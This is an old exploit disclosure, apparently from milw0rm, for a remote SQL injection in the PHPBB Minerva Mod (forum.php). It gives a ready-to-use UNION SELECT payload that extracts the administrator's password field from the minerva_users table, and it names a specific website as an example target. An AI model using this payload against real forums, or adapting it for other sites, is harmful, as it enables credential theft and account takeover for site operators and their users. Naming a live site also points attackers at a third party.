27 lines
No EOL
670 B
Text
27 lines
No EOL
670 B
Text
======================X=O=R=O=N=====================
|
|
+
|
|
+ PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit
|
|
+
|
|
======================X=O=R=O=N=====================
|
|
+
|
|
+ Bulan: xoron
|
|
+
|
|
+ xoron.biz
|
|
+
|
|
======================X=O=R=O=N=====================
|
|
+
|
|
+ SQL INJ:
|
|
+
|
|
+ forum.php ?c=-1/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*
|
|
+
|
|
======================X=O=R=O=N=====================
|
|
+
|
|
+ Example: http://www.ayyquerico.com/Portal/
|
|
+
|
|
======================X=O=R=O=N=====================
|
|
+
|
|
+ Special thanx: ajann
|
|
+
|
|
======================X=O=R=O=N=====================
|
|
|
|
# milw0rm.com [2007-03-19] |